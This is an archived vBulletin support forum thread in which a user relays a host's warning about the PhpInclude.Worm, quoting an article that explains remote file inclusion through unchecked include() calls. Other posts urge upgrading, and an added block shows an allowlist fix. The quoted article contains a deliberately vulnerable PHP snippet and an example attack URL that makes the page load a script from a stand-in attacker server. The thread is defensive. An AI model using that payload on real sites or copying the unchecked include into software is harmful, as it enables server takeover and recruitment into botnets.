The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
PHP worm?
I was informed by my host there is a PHP worm out there... do you have an update, or is vBulletin already secure for it? I run version 2.3.0.

This is a copy of the email I got. Any help would be appreciated.

There is a worm using Google to look for insecure PHP pages. The worm will exploit the PHP pages and take over your site ranging from web site defacement to deletion of files. The problem relates to insecure PHP coding using the following items: include(), require(), mail(), upload

---------

From the article:

The new worm PhpInclude.Worm is currently propagated on Internet, it attacks any nonprotected dynamic page. [ This worm is detected by certain antivirus as being an alternative of Santy. We estimate that this worm is completely different from the Santy family, we thus decided to allot alias generic "the PhpInclude.Worm to him" ].

Contrary to Santy, PhpInclude.Worm does not exploit the vulnerabilities phpBB, it exploits a broader pallet of faults known as "of programming". It seeks (via Google/Yahoo/AOL) Web servers whose php pages use the functions "include()" and "require()" in a not-protected way.

How?

These functions are normally used by the programmers in order to include Web pages specified in arguments. Unfortunately, not checking these arguments can allow the inclusion and the execution of external files, and thus the compromising of the Web server:

Example: vulnerable.php

    if(isset($page)) {
        include($page);
    }

-----------------------------------------------

The page above correctly does not filter the variable $page, it thus allows inclusion then the execution of distant arbitrary scripts:

vulnerable.php?page=http://server_pirate/scriptmalicieux?cmd=commandes_malicieuses

PhpInclude.Worm thus seeks pages of the type "* php?*=", then tries to insert various orders there allowing the installation of robots IRC and the constitution of an army of machines zombies.

--
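A hardened counterpart to the vulnerable.php snippet quoted in the post above, as an added example that is not part of the original thread or of vBulletin's code. The page keys, file names and the pages/ directory are hypothetical; the request value is only ever used as a lookup key, never as a path or URL.

```php
<?php
// Added example, not from the original post. Page keys, file names and the
// pages/ directory are hypothetical.
// Server-side backstop in php.ini (PHP 5.2 and later): allow_url_include = Off

// Allowlist: request value => file on disk.
const PAGES = [
    'home'    => 'home.php',
    'faq'     => 'faq.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a requested page key to an absolute file path, or null if the
 * key is unknown or the file does not sit inside $baseDir.
 */
function resolve_page($requested, string $baseDir): ?string
{
    // Reject arrays (?page[]=x) and anything that is not a known key.
    // A value such as "http://host/script" is simply not in the list.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }

    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null; // directory or file missing
    }

    // Defence in depth: the resolved file must live under the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Read the parameter explicitly from $_GET rather than using a bare $page,
// which any request could set when register_globals is enabled.
$file = resolve_page($_GET['page'] ?? 'home', __DIR__ . '/pages');
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
include $file;
```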
#2
Please read this important announcement about a security issue with your version of vB:
http://www.vbulletin.com/forum/showt...180#post694180

It is not related to the PHP worm, but this does need to be patched. I strongly recommend upgrading to at least 2.3.5 ASAP.

Please read this announcement concerning the phpBB worm and your vBulletin forums:
http://www.vbulletin.com/forum/showthread.php?t=124008
#3
I don't understand why you don't just upgrade to 3.0.3?